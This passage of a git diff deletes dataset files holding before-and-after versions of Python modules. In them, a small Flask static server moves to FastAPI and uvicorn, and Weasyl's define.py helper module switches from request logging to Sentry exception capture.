root.joinpath(config.static_files_dir) -- return send_from_directory(abspath, path) -+root = utils.get_project_root() -+abspath = root.joinpath(config.static_files_dir) -+app.mount("/openvtuber", StaticFiles(directory=abspath), name="openvtuber-fastAPI") - - - def run_web_server(): -- app.run(host=config.ip_address, port=config.port, use_reloader=False, debug=True) -+ uvicorn.run(app, host=config.ip_address, port=config.port) diff --git a/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.source.py b/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.source.py deleted file mode 100644 index c760af5..0000000 --- a/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.source.py +++ /dev/null @@ -1,17 +0,0 @@ -from .config import Configuration as config - -from flask import Flask, send_from_directory -from openvtuber import utils - -app = Flask(__name__, static_url_path='') - - -@app.route('/openvtuber/') -def serve_pwa(path): - root = utils.get_project_root() - abspath = root.joinpath(config.static_files_dir) - return send_from_directory(abspath, path) - - -def run_web_server(): - app.run(host=config.ip_address, port=config.port, use_reloader=False, debug=True) diff --git a/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.target.py b/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.target.py deleted file mode 100644 index 754ed02..0000000 --- a/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.target.py +++ /dev/null @@ -1,16 +0,0 @@ -from .config import Configuration as config - -import uvicorn -from fastapi import FastAPI -from fastapi.staticfiles import StaticFiles -from openvtuber import utils - -app = FastAPI() - -root = utils.get_project_root() -abspath = root.joinpath(config.static_files_dir) -app.mount("/openvtuber", StaticFiles(directory=abspath), name="openvtuber-fastAPI") - - -def run_web_server(): - uvicorn.run(app, host=config.ip_address, port=config.port) diff --git a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.diff b/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.diff deleted file mode 100644 index f6a76c6..0000000 --- a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.diff +++ /dev/null @@ -1,52 +0,0 @@ -diff --git a/weasyl/define.py b/weasyl/define.py - index 97717e00368e9f650dd2daf3493ee76291dc5710..d10cb162447d9e3a9506b76054851863b10ff27a 100644 - --- a/weasyl/define.py - +++ b/weasyl/define.py -@@ -5,7 +5,6 @@ import hashlib - import hmac - import itertools - import json --import logging - import numbers - import datetime - import pkgutil -@@ -17,6 +16,7 @@ import pytz - import requests - import sqlalchemy as sa - import sqlalchemy.orm -+from sentry_sdk import capture_exception - from sqlalchemy.exc import OperationalError - from web.template import Template - -@@ -76,14 +76,6 @@ def connect(): - return sessionmaker() - - --def log_exc(**kwargs): -- """ -- Logs an exception. This is essentially a wrapper around the current request's log_exc. -- It's provided for compatibility for methods that depended on web.ctx.log_exc(). -- """ -- return get_current_request().log_exc(**kwargs) -- -- - def execute(statement, argv=None): - """ - Executes an SQL statement; if `statement` represents a SELECT or RETURNING -@@ -981,14 +973,13 @@ def _requests_wrapper(func_name): - func = getattr(requests, func_name) - - def wrapper(*a, **kw): -- request = get_current_request() - try: - return func(*a, **kw) - except Exception as e: -- request.log_exc(level=logging.DEBUG) -+ capture_exception(e, level='info') - w = WeasylError('httpError') - w.error_suffix = 'The original error was: %s' % (e,) -- raise w -+ raise w from e - - return wrapper - diff --git a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.source.py b/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.source.py deleted file mode 100644 index f50b703..0000000 --- a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.source.py +++ /dev/null @@ -1,1087 +0,0 @@ -import os -import time -import random -import hashlib -import hmac -import itertools -import json -import logging -import numbers -import datetime -import pkgutil -from urllib.parse import urlencode, urljoin - -import arrow -from pyramid.threadlocal import get_current_request -import pytz -import requests -import sqlalchemy as sa -import sqlalchemy.orm -from sqlalchemy.exc import OperationalError -from web.template import Template - -import libweasyl.constants -from libweasyl.cache import region -from libweasyl.legacy import UNIXTIME_OFFSET as _UNIXTIME_OFFSET, get_sysname -from libweasyl.models.tables import metadata as meta -from libweasyl import html, text, ratings, security, staff - -from weasyl import config -from weasyl import errorcode -from weasyl import macro -from weasyl.config import config_obj, config_read_setting -from weasyl.error import WeasylError -from weasyl.macro import MACRO_SUPPORT_ADDRESS - - -_shush_pyflakes = [sqlalchemy.orm] - - -reload_templates = bool(os.environ.get('WEASYL_RELOAD_TEMPLATES')) -reload_assets = bool(os.environ.get('WEASYL_RELOAD_ASSETS')) - - -def _load_resources(): - global resource_paths - - with open(os.path.join(macro.MACRO_APP_ROOT, 'build/rev-manifest.json'), 'r') as f: - resource_paths = json.loads(f.read()) - - -_load_resources() - - -def record_timing(func): - return func - - -_sqlalchemy_url = config_obj.get('sqlalchemy', 'url') -if config._in_test: - _sqlalchemy_url += '_test' -engine = meta.bind = sa.create_engine(_sqlalchemy_url, max_overflow=25, pool_size=10) -sessionmaker = sa.orm.scoped_session(sa.orm.sessionmaker(bind=engine, autocommit=True)) - - -def connect(): - """ - Returns the current request's db connection or one from the engine. - """ - request = get_current_request() - if request is not None: - return request.pg_connection - # If there's no threadlocal request, we're probably operating in a cron task or the like. - # Return a connection from the pool. n.b. this means that multiple calls could get different - # connections. - # TODO(hyena): Does this clean up correctly? There's no registered 'close()' call. - return sessionmaker() - - -def log_exc(**kwargs): - """ - Logs an exception. This is essentially a wrapper around the current request's log_exc. - It's provided for compatibility for methods that depended on web.ctx.log_exc(). - """ - return get_current_request().log_exc(**kwargs) - - -def execute(statement, argv=None): - """ - Executes an SQL statement; if `statement` represents a SELECT or RETURNING - statement, the query results will be returned. - """ - db = connect() - - if argv: - argv = tuple(argv) - - for x in argv: - if type(x) is not int: - raise TypeError("can't use %r as define.execute() parameter" % (x,)) - - statement %= argv - - query = db.connection().execute(statement) - - if statement.lstrip()[:6] == "SELECT" or " RETURNING " in statement: - return query.fetchall() - else: - query.close() - - -def column(results): - """ - Get a list of values from a single-column ResultProxy. - """ - return [x for x, in results] - - -_PG_SERIALIZATION_FAILURE = u'40001' - - -def serializable_retry(action, limit=16): - """ - Runs an action accepting a `Connection` parameter in a serializable - transaction, retrying it up to `limit` times. - """ - with engine.connect() as db: - db = db.execution_options(isolation_level='SERIALIZABLE') - - for i in itertools.count(1): - try: - with db.begin(): - return action(db) - except OperationalError as e: - if i == limit or e.orig.pgcode != _PG_SERIALIZATION_FAILURE: - raise - - -with open(os.path.join(macro.MACRO_APP_ROOT, "version.txt")) as f: - CURRENT_SHA = f.read().strip() - - -# Caching all templates. Parsing templates is slow; we don't need to do it all -# the time and there's plenty of memory for storing the compiled templates. -_template_cache = {} - - -def _compile(template_name): - """ - Compiles a template file and returns the result. - """ - template = _template_cache.get(template_name) - - if template is None or reload_templates: - _template_cache[template_name] = template = Template( - pkgutil.get_data(__name__, 'templates/' + template_name).decode('utf-8'), - filename=template_name, - globals={ - "STR": str, - "LOGIN": get_sysname, - "TOKEN": get_token, - "CSRF": _get_csrf_input, - "USER_TYPE": user_type, - "DATE": convert_date, - "ISO8601_DATE": iso8601_date, - "TIME": _convert_time, - "LOCAL_ARROW": local_arrow, - "PRICE": text_price_amount, - "SYMBOL": text_price_symbol, - "TITLE": titlebar, - "RENDER": render, - "COMPILE": _compile, - "MARKDOWN": text.markdown, - "MARKDOWN_EXCERPT": text.markdown_excerpt, - "SUMMARIZE": summarize, - "SHA": CURRENT_SHA, - "NOW": get_time, - "THUMB": thumb_for_sub, - "WEBP_THUMB": webp_thumb_for_sub, - "M": macro, - "R": ratings, - "SLUG": text.slug_for, - "QUERY_STRING": query_string, - "INLINE_JSON": html.inline_json, - "PATH": _get_path, - "arrow": arrow, - "constants": libweasyl.constants, - "getattr": getattr, - "json": json, - "sorted": sorted, - "staff": staff, - "resource_path": get_resource_path, - }) - - return template - - -def render(template_name, argv=()): - """ - Renders a template and returns the resulting HTML. - """ - template = _compile(template_name) - return str(template(*argv)) - - -def titlebar(title, backtext=None, backlink=None): - return render("common/stage_title.html", [title, backtext, backlink]) - - -def errorpage_html(userid, message_html, links=None, request_id=None, **extras): - return webpage(userid, "error/error.html", [message_html, links, request_id], **extras) - - -def errorpage(userid, code=None, links=None, request_id=None, **extras): - if code is None: - code = errorcode.unexpected - - return errorpage_html(userid, text.markdown(code), links, request_id, **extras) - - -def webpage(userid, template, argv=None, options=None, **extras): - if argv is None: - argv = [] - - if options is None: - options = [] - - page = common_page_start(userid, options=options, **extras) - page.append(render(template, argv)) - - return common_page_end(userid, page, options=options) - - -def get_weasyl_session(): - """ - Gets the weasyl_session for the current request. Most code shouldn't have to use this. - """ - # TODO: This method is inelegant. Remove this logic after updating login.signin(). - return get_current_request().weasyl_session - - -def get_userid(): - """ - Returns the userid corresponding to the current request, if any. - """ - return get_current_request().userid - - -def is_csrf_valid(request, token): - expected = request.weasyl_session.csrf_token - return expected is not None and hmac.compare_digest(str(token), str(expected)) - - -def get_token(): - from weasyl import api - - request = get_current_request() - - if api.is_api_user(request): - return '' - - # allow error pages with $:{TOKEN()} in the template to be rendered even - # when the error occurred before the session middleware set a session - if not hasattr(request, 'weasyl_session'): - return security.generate_key(20) - - sess = request.weasyl_session - if sess.csrf_token is None: - sess.csrf_token = security.generate_key(64) - sess.save = True - return sess.csrf_token - - -def _get_csrf_input(): - return '' % (get_token(),) - - -@region.cache_on_arguments(namespace='v3') -def _get_all_config(userid): - """ - Queries for, and returns, common user configuration settings. - - :param userid: The userid to query. - :return: A dict(), containing the following keys/values: - is_banned: Boolean. Is the user currently banned? - is_suspended: Boolean. Is the user currently suspended? - is_vouched_for: Boolean. Is the user vouched for? - profile_configuration: CharSettings/string. Configuration options in the profile. - jsonb_settings: JSON/dict. Profile settings set via jsonb_settings. - """ - row = engine.execute(""" - SELECT EXISTS (SELECT FROM permaban WHERE permaban.userid = %(userid)s) AS is_banned, - EXISTS (SELECT FROM suspension WHERE suspension.userid = %(userid)s) AS is_suspended, - lo.voucher IS NOT NULL AS is_vouched_for, - pr.config AS profile_configuration, - pr.jsonb_settings - FROM login lo INNER JOIN profile pr USING (userid) - WHERE userid = %(userid)s - """, userid=userid).first() - - return dict(row) - - -def get_config(userid): - """ Gets user configuration from the profile table (profile.config)""" - if not userid: - return "" - return _get_all_config(userid)['profile_configuration'] - - -def get_login_settings(userid): - """ Returns a Boolean pair in the form of (is_banned, is_suspended)""" - r = _get_all_config(userid) - return r['is_banned'], r['is_suspended'] - - -def is_vouched_for(userid): - return _get_all_config(userid)['is_vouched_for'] - - -def get_profile_settings(userid): - from weasyl.profile import ProfileSettings - - if not userid: - jsonb = {} - else: - jsonb = _get_all_config(userid)['jsonb_settings'] - - if jsonb is None: - jsonb = {} - - return ProfileSettings(jsonb) - - -def get_rating(userid): - if not userid: - return ratings.GENERAL.code - - if is_sfw_mode(): - profile_settings = get_profile_settings(userid) - - # if no explicit max SFW rating picked assume general as a safe default - return profile_settings.max_sfw_rating - - config = get_config(userid) - if 'p' in config: - return ratings.EXPLICIT.code - elif 'a' in config: - return ratings.MATURE.code - else: - return ratings.GENERAL.code - - -# this method is used specifically for the settings page, where -# the max sfw/nsfw rating need to be displayed separately -def get_config_rating(userid): - """ - Retrieve the sfw-mode and regular-mode ratings separately - :param userid: the user to retrieve ratings for - :return: a tuple of (max_rating, max_sfw_rating) - """ - config = get_config(userid) - - if 'p' in config: - max_rating = ratings.EXPLICIT.code - elif 'a' in config: - max_rating = ratings.MATURE.code - else: - max_rating = ratings.GENERAL.code - - profile_settings = get_profile_settings(userid) - sfw_rating = profile_settings.max_sfw_rating - return max_rating, sfw_rating - - -def is_sfw_mode(): - """ - determine whether the current session is in SFW mode - :return: TRUE if sfw or FALSE if nsfw - """ - return get_current_request().cookies.get('sfwmode', "nsfw") == "sfw" - - -def get_premium(userid): - if not userid: - return False - - config = get_config(userid) - return "d" in config - - -@region.cache_on_arguments() -@record_timing -def _get_display_name(userid): - """ - Return the display name assiciated with `userid`; if no such user exists, - return None. - """ - return engine.scalar("SELECT username FROM profile WHERE userid = %(user)s", user=userid) - - -def get_display_name(userid): - if not userid: - return None - return _get_display_name(userid) - - -def get_int(target): - if target is None: - return 0 - - if isinstance(target, numbers.Number): - return int(target) - - try: - return int("".join(i for i in target if i.isdigit())) - except ValueError: - return 0 - - -def get_targetid(*argv): - for i in argv: - if i: - return i - - -def get_search_tag(target): - target = "".join(i for i in target if ord(i) < 128) - target = target.replace(" ", "_") - target = "".join(i for i in target if i.isalnum() or i in "_") - target = target.strip("_") - target = "_".join(i for i in target.split("_") if i) - - return target.lower() - - -def get_time(): - """ - Returns the current unixtime. - """ - return int(time.time()) + _UNIXTIME_OFFSET - - -def get_timestamp(): - """ - Returns the current date in the format YYYY-MM. - """ - return time.strftime("%Y-%m", time.localtime(get_time())) - - -def _get_hash_path(charid): - id_hash = hashlib.sha1(b"%i" % (charid,)).hexdigest() - return "/".join([id_hash[i:i + 2] for i in range(0, 11, 2)]) + "/" - - -def get_character_directory(charid): - return macro.MACRO_SYS_CHAR_PATH + _get_hash_path(charid) - - -@region.cache_multi_on_arguments(should_cache_fn=bool) -def _get_userids(*sysnames): - result = engine.execute( - "SELECT login_name, userid FROM login WHERE login_name = ANY (%(names)s)" - " UNION ALL SELECT alias_name, userid FROM useralias WHERE alias_name = ANY (%(names)s)" - " UNION ALL SELECT login_name, userid FROM username_history WHERE active AND login_name = ANY (%(names)s)", - names=list(sysnames), - ) - - sysname_userid = dict(result.fetchall()) - - return [sysname_userid.get(sysname, 0) for sysname in sysnames] - - -def get_userids(usernames): - ret = {} - lookup_usernames = [] - sysnames = [] - - for username in usernames: - sysname = get_sysname(username) - - if sysname: - lookup_usernames.append(username) - sysnames.append(sysname) - else: - ret[username] = 0 - - ret.update(zip(lookup_usernames, _get_userids(*sysnames))) - - return ret - - -def get_userid_list(target): - usernames = target.split(";") - return [userid for userid in get_userids(usernames).values() if userid != 0] - - -def get_ownerid(submitid=None, charid=None, journalid=None): - if submitid: - return engine.scalar("SELECT userid FROM submission WHERE submitid = %(id)s", id=submitid) - if charid: - return engine.scalar("SELECT userid FROM character WHERE charid = %(id)s", id=charid) - if journalid: - return engine.scalar("SELECT userid FROM journal WHERE journalid = %(id)s", id=journalid) - - -def get_random_set(target, count): - """ - Returns the specified number of unique items chosen at random from the target - list. If more items are specified than the list contains, the full contents - of the list will be returned in a randomized order. - """ - return random.sample(target, min(count, len(target))) - - -def get_address(): - request = get_current_request() - return request.client_addr - - -def _get_path(): - return get_current_request().path_url - - -def text_price_amount(target): - return "%.2f" % (float(target) / 100.0) - - -def text_price_symbol(target): - from weasyl.commishinfo import CURRENCY_CHARMAP - for c in target: - if c in CURRENCY_CHARMAP: - return CURRENCY_CHARMAP[c].symbol - return CURRENCY_CHARMAP[''].symbol - - -def text_first_line(target, strip=False): - """ - Return the first line of text; if `strip` is True, return all but the first - line of text. - """ - first_line, _, rest = target.partition("\n") - - if strip: - return rest - else: - return first_line - - -def text_fix_url(target): - if target.startswith(("http://", "https://")): - return target - - return "http://" + target - - -def local_arrow(dt): - tz = get_current_request().weasyl_session.timezone - return arrow.Arrow.fromdatetime(tz.localtime(dt)) - - -def convert_to_localtime(target): - tz = get_current_request().weasyl_session.timezone - if isinstance(target, arrow.Arrow): - return tz.localtime(target.datetime) - elif isinstance(target, datetime.datetime): - return tz.localtime(target) - else: - target = int(get_time() if target is None else target) - _UNIXTIME_OFFSET - return tz.localtime_from_timestamp(target) - - -def convert_date(target=None): - """ - Returns the date in the format 1 January 1970. If no target is passed, the - current date is returned. - """ - dt = convert_to_localtime(target) - result = dt.strftime("%d %B %Y") - return result[1:] if result and result[0] == "0" else result - - -def iso8601_date(target): - """ - Converts a Weasyl timestamp to an ISO 8601 date (yyyy-mm-dd). - - NB: Target is offset by _UNIXTIME_OFFSET - - :param target: The target Weasyl timestamp to convert. - :return: An ISO 8601 string representing the date of `target`. - """ - date = datetime.datetime.utcfromtimestamp(target - _UNIXTIME_OFFSET) - return arrow.get(date).format("YYYY-MM-DD") - - -def _convert_time(target=None): - """ - Returns the time in the format 16:00:00. If no target is passed, the - current time is returned. - """ - dt = convert_to_localtime(target) - config = get_config(get_userid()) - if '2' in config: - return dt.strftime("%I:%M:%S %p %Z") - else: - return dt.strftime("%H:%M:%S %Z") - - -def convert_unixdate(day, month, year): - """ - Returns the unixtime corresponding to the beginning of the specified date; if - the date is not valid, None is returned. - """ - day, month, year = (get_int(i) for i in [day, month, year]) - - try: - ret = int(time.mktime(datetime.date(year, month, day).timetuple())) - except ValueError: - return None - # range of a postgres integer - if ret > 2147483647 or ret < -2147483648: - return None - return ret - - -def convert_age(target): - return (get_time() - target) // 31556926 - - -def age_in_years(birthdate): - """ - Determines an age in years based off of the given arrow.Arrow birthdate - and the current date. - """ - now = arrow.now() - is_upcoming = (now.month, now.day) < (birthdate.month, birthdate.day) - - return now.year - birthdate.year - int(is_upcoming) - - -def user_type(userid): - if userid in staff.DIRECTORS: - return "director" - if userid in staff.TECHNICAL: - return "tech" - if userid in staff.ADMINS: - return "admin" - if userid in staff.MODS: - return "mod" - if userid in staff.DEVELOPERS: - return "dev" - - return None - - -@region.cache_on_arguments(expiration_time=180) -@record_timing -def _page_header_info(userid): - messages = engine.scalar( - "SELECT COUNT(*) FROM message WHERE otherid = %(user)s AND settings ~ 'u'", user=userid) - result = [messages, 0, 0, 0, 0] - - counts = engine.execute( - """ - SELECT type / 1000 AS group, COUNT(*) AS count - FROM welcome - LEFT JOIN submission - ON welcome.targetid = submission.submitid - AND welcome.type BETWEEN 2000 AND 2999 - WHERE - welcome.userid = %(user)s - AND ( - submission.rating IS NULL - OR submission.rating <= %(rating)s - ) - GROUP BY "group" - """, user=userid, rating=get_rating(userid)) - - for group, count in counts: - result[5 - group] = count - - return result - - -def page_header_info(userid): - from weasyl import media - sfw = get_current_request().cookies.get('sfwmode', 'nsfw') - return { - "welcome": _page_header_info(userid), - "userid": userid, - "username": get_display_name(userid), - "user_media": media.get_user_media(userid), - "sfw": sfw, - } - - -def common_page_start(userid, options=None, **extended_options): - if options is None: - options = [] - - userdata = None - if userid: - userdata = page_header_info(userid) - - data = render( - "common/page_start.html", [userdata, options, extended_options]) - - return [data] - - -def common_page_end(userid, page, options=None): - data = render("common/page_end.html", (options,)) - page.append(data) - return "".join(page) - - -def common_status_check(userid): - """ - Returns the name of the script to which the user should be redirected - if required. - """ - if not userid: - return None - - is_banned, is_suspended = get_login_settings(userid) - - if is_banned: - return "banned" - if is_suspended: - return "suspended" - - return None - - -def common_status_page(userid, status): - """ - Raise the redirect to the script returned by common_status_check() or render - the appropriate site status error page. - """ - if status in ('banned', 'suspended'): - from weasyl import moderation, login - - login.signout(get_current_request()) - if status == 'banned': - reason = moderation.get_ban_reason(userid) - return errorpage( - userid, - "Your account has been permanently banned and you are no longer allowed " - "to sign in.\n\n%s\n\nIf you believe this ban is in error, please " - "contact %s for assistance." % (reason, MACRO_SUPPORT_ADDRESS)) - - elif status == 'suspended': - suspension = moderation.get_suspension(userid) - return errorpage( - userid, - "Your account has been temporarily suspended and you are not allowed to " - "be logged in at this time.\n\n%s\n\nThis suspension will be lifted on " - "%s.\n\nIf you believe this suspension is in error, please contact " - "%s for assistance." % (suspension.reason, convert_date(suspension.release), MACRO_SUPPORT_ADDRESS)) - - -_content_types = { - 'submit': 110, - 'char': 120, - 'journal': 130, - 'profile': 210, -} - - -def common_view_content(userid, targetid, feature): - """ - Return True if a record was successfully inserted into the views table - and the page view statistic incremented, else False. - """ - if feature == "profile" and targetid == userid: - return - - typeid = _content_types.get(feature, 0) - if userid: - viewer = 'user:%d' % (userid,) - else: - viewer = get_address() - - result = engine.execute( - 'INSERT INTO views (viewer, targetid, type) VALUES (%(viewer)s, %(targetid)s, %(type)s) ON CONFLICT DO NOTHING', - viewer=viewer, targetid=targetid, type=typeid) - - if result.rowcount == 0: - return False - - if feature == "submit": - engine.execute("UPDATE submission SET page_views = page_views + 1 WHERE submitid = %(id)s", id=targetid) - elif feature == "char": - engine.execute("UPDATE character SET page_views = page_views + 1 WHERE charid = %(id)s", id=targetid) - elif feature == "journal": - engine.execute("UPDATE journal SET page_views = page_views + 1 WHERE journalid = %(id)s", id=targetid) - elif feature == "profile": - engine.execute("UPDATE profile SET page_views = page_views + 1 WHERE userid = %(id)s", id=targetid) - - return True - - -def append_to_log(logname, **parameters): - parameters['when'] = datetime.datetime.now().isoformat() - log_path = '%s%s.%s.log' % (macro.MACRO_SYS_LOG_PATH, logname, get_timestamp()) - with open(log_path, 'a') as outfile: - outfile.write(json.dumps(parameters)) - outfile.write('\n') - - -_CHARACTER_SETTINGS_FEATURE_SYMBOLS = { - "char/thumb": "-", - "char/cover": "~", - "char/submit": "=", -} - -_CHARACTER_SETTINGS_TYPE_EXTENSIONS = { - "J": ".jpg", - "P": ".png", - "G": ".gif", - "T": ".txt", - "H": ".htm", - "M": ".mp3", - "F": ".swf", - "A": ".pdf", -} - - -def url_type(settings, feature): - """ - Return the file extension specified in `settings` for the passed feature. - """ - symbol = _CHARACTER_SETTINGS_FEATURE_SYMBOLS[feature] - type_code = settings[settings.index(symbol) + 1] - - return _CHARACTER_SETTINGS_TYPE_EXTENSIONS[type_code] - - -def url_make(targetid, feature, query=None, root=False, file_prefix=None): - """ - Return the URL to a resource; if `root` is True, the path will start from - the root. - """ - result = [] if root else ["/"] - - if root: - result.append(macro.MACRO_STORAGE_ROOT) - - if "char/" in feature: - result.extend([macro.MACRO_URL_CHAR_PATH, _get_hash_path(targetid)]) - - if file_prefix is not None: - result.append("%s-" % (file_prefix,)) - - # Character file - if feature == "char/submit": - if query is None: - query = engine.execute("SELECT userid, settings FROM character WHERE charid = %(id)s", id=targetid).first() - - if query and "=" in query[1]: - result.append("%i.submit.%i%s" % (targetid, query[0], url_type(query[1], feature))) - else: - return None - # Character cover - elif feature == "char/cover": - if query is None: - query = engine.execute("SELECT settings FROM character WHERE charid = %(id)s", id=targetid).first() - - if query and "~" in query[0]: - result.append("%i.cover%s" % (targetid, url_type(query[0], feature))) - else: - return None - # Character thumbnail - elif feature == "char/thumb": - if query is None: - query = engine.execute("SELECT settings FROM character WHERE charid = %(id)s", id=targetid).first() - - if query and "-" in query[0]: - result.append("%i.thumb%s" % (targetid, url_type(query[0], feature))) - else: - return None if root else get_resource_path("img/default-visual.png") - # Character thumbnail selection - elif feature == "char/.thumb": - result.append("%i.new.thumb" % (targetid,)) - - return "".join(result) - - -def cdnify_url(url): - cdn_root = config_read_setting("cdn_root") - if not cdn_root: - return url - - return urljoin(cdn_root, url) - - -def get_resource_path(resource): - if reload_assets: - _load_resources() - - return '/' + resource_paths[resource] - - -def get_resource_url(resource): - """ - Get a full URL for a resource. - - Useful for , for example. - """ - return 'https://www.weasyl.com' + get_resource_path(resource) - - -DEFAULT_SUBMISSION_THUMBNAIL = [ - dict.fromkeys( - ['display_url', 'file_url'], - get_resource_path('img/default-visual.png'), - ), -] - -DEFAULT_AVATAR = [ - dict.fromkeys( - ['display_url', 'file_url'], - get_resource_path('img/default-avatar.jpg'), - ), -] - - -def absolutify_url(url): - cdn_root = config_read_setting("cdn_root") - if cdn_root and url.startswith(cdn_root): - return url - - return urljoin(get_current_request().application_url, url) - - -def user_is_twitterbot(): - return get_current_request().environ.get('HTTP_USER_AGENT', '').startswith('Twitterbot') - - -def summarize(s, max_length=200): - if len(s) > max_length: - return s[:max_length - 1].rstrip() + u'\N{HORIZONTAL ELLIPSIS}' - return s - - -def clamp(val, lower_bound, upper_bound): - return min(max(val, lower_bound), upper_bound) - - -def timezones(): - ct = datetime.datetime.now(pytz.utc) - timezones_by_country = [ - (pytz.country_names[cc], [ - (int(ct.astimezone(pytz.timezone(tzname)).strftime("%z")), tzname) - for tzname in timezones - ]) - for cc, timezones in pytz.country_timezones.items()] - timezones_by_country.sort() - ret = [] - for country, timezones in timezones_by_country: - ret.append(('- %s -' % (country,), None)) - ret.extend( - ("[UTC%+05d] %s" % (offset, tzname.replace('_', ' ')), tzname) - for offset, tzname in timezones) - return ret - - -def query_string(query): - pairs = [] - - for key, value in query.items(): - if isinstance(value, (tuple, list, set)): - for subvalue in value: - pairs.append((key, subvalue)) - elif value: - pairs.append((key, value)) - - return urlencode(pairs) - - -def _requests_wrapper(func_name): - func = getattr(requests, func_name) - - def wrapper(*a, **kw): - request = get_current_request() - try: - return func(*a, **kw) - except Exception as e: - request.log_exc(level=logging.DEBUG) - w = WeasylError('httpError') - w.error_suffix = 'The original error was: %s' % (e,) - raise w - - return wrapper - - -http_get = _requests_wrapper('get') -http_post = _requests_wrapper('post') - - -def metric(*a, **kw): - pass - - -def iso8601(unixtime): - if isinstance(unixtime, arrow.Arrow) or isinstance(unixtime, datetime.datetime): - return unixtime.isoformat().partition('.')[0] + 'Z' - else: - return datetime.datetime.utcfromtimestamp(unixtime - _UNIXTIME_OFFSET).isoformat() + 'Z' - - -def parse_iso8601(s): - return arrow.Arrow.strptime(s, '%Y-%m-%dT%H:%M:%SZ').timestamp + _UNIXTIME_OFFSET - - -def paginate(results, backid, nextid, limit, key): - at_start = at_end = False - # if neither value is specified, we're definitely at the start - if not backid and not nextid: - at_start = True - - # if we were cut short... - if len(results) <= limit: - if backid: - # if moving backward we're at the start - at_start = True - else: - # if moving forward we're at the end - at_end = True - elif backid: - # delete extraneous rows from the front if we're moving backward - del results[:-limit] - else: - # or from the back if we're moving forward - del results[limit:] - - return ( - None if at_start or not results else results[0][key], - None if at_end or not results else results[-1][key]) - - -def thumb_for_sub(submission): - """ - Given a submission dict containing sub_media, sub_type and userid, - returns the appropriate media item to use as a thumbnail. - - Params: - submission: The submission. - - Returns: - The sub media to use as a thumb. - """ - user_id = get_userid() - profile_settings = get_profile_settings(user_id) - if (profile_settings.disable_custom_thumbs and - submission.get('subtype', 9999) < 2000 and - submission['userid'] != user_id): - thumb_key = 'thumbnail-generated' - else: - thumb_key = 'thumbnail-custom' if 'thumbnail-custom' in submission['sub_media'] else 'thumbnail-generated' - - return submission['sub_media'][thumb_key][0] - - -def webp_thumb_for_sub(submission): - """ - Given a submission dict containing sub_media, sub_type and userid, - returns the appropriate WebP media item to use as a thumbnail. - - Params: - submission: The submission. - - Returns: - The sub media to use as a thumb, or None. - """ - user_id = get_userid() - profile_settings = get_profile_settings(user_id) - disable_custom_thumb = ( - profile_settings.disable_custom_thumbs and - submission.get('subtype', 9999) < 2000 and - submission['userid'] != user_id - ) - - if not disable_custom_thumb and 'thumbnail-custom' in submission['sub_media']: - return None - - thumbnail_generated_webp = submission['sub_media'].get('thumbnail-generated-webp') - return thumbnail_generated_webp and thumbnail_generated_webp[0] diff --git a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.target.py b/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.target.py deleted file mode 100644 index de6c454..0000000 --- a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.target.py +++ /dev/null @@ -1,1078 +0,0 @@ -import os -import time -import random -import hashlib -import hmac -import itertools -import json -import numbers -import datetime -import pkgutil -from urllib.parse import urlencode, urljoin - -import arrow -from pyramid.threadlocal import get_current_request -import pytz -import requests -import sqlalchemy as sa -import sqlalchemy.orm -from sentry_sdk import capture_exception -from sqlalchemy.exc import OperationalError -from web.template import Template - -import libweasyl.constants -from libweasyl.cache import region -from libweasyl.legacy import UNIXTIME_OFFSET as _UNIXTIME_OFFSET, get_sysname -from libweasyl.models.tables import metadata as meta -from libweasyl import html, text, ratings, security, staff - -from weasyl import config -from weasyl import errorcode -from weasyl import macro -from weasyl.config import config_obj, config_read_setting -from weasyl.error import WeasylError -from weasyl.macro import MACRO_SUPPORT_ADDRESS - - -_shush_pyflakes = [sqlalchemy.orm] - - -reload_templates = bool(os.environ.get('WEASYL_RELOAD_TEMPLATES')) -reload_assets = bool(os.environ.get('WEASYL_RELOAD_ASSETS')) - - -def _load_resources(): - global resource_paths - - with open(os.path.join(macro.MACRO_APP_ROOT, 'build/rev-manifest.json'), 'r') as f: - resource_paths = json.loads(f.read()) - - -_load_resources() - - -def record_timing(func): - return func - - -_sqlalchemy_url = config_obj.get('sqlalchemy', 'url') -if config._in_test: - _sqlalchemy_url += '_test' -engine = meta.bind = sa.create_engine(_sqlalchemy_url, max_overflow=25, pool_size=10) -sessionmaker = sa.orm.scoped_session(sa.orm.sessionmaker(bind=engine, autocommit=True)) - - -def connect(): - """ - Returns the current request's db connection or one from the engine. - """ - request = get_current_request() - if request is not None: - return request.pg_connection - # If there's no threadlocal request, we're probably operating in a cron task or the like. - # Return a connection from the pool. n.b. this means that multiple calls could get different - # connections. - # TODO(hyena): Does this clean up correctly? There's no registered 'close()' call. - return sessionmaker() - - -def execute(statement, argv=None): - """ - Executes an SQL statement; if `statement` represents a SELECT or RETURNING - statement, the query results will be returned. - """ - db = connect() - - if argv: - argv = tuple(argv) - - for x in argv: - if type(x) is not int: - raise TypeError("can't use %r as define.execute() parameter" % (x,)) - - statement %= argv - - query = db.connection().execute(statement) - - if statement.lstrip()[:6] == "SELECT" or " RETURNING " in statement: - return query.fetchall() - else: - query.close() - - -def column(results): - """ - Get a list of values from a single-column ResultProxy. - """ - return [x for x, in results] - - -_PG_SERIALIZATION_FAILURE = u'40001' - - -def serializable_retry(action, limit=16): - """ - Runs an action accepting a `Connection` parameter in a serializable - transaction, retrying it up to `limit` times. - """ - with engine.connect() as db: - db = db.execution_options(isolation_level='SERIALIZABLE') - - for i in itertools.count(1): - try: - with db.begin(): - return action(db) - except OperationalError as e: - if i == limit or 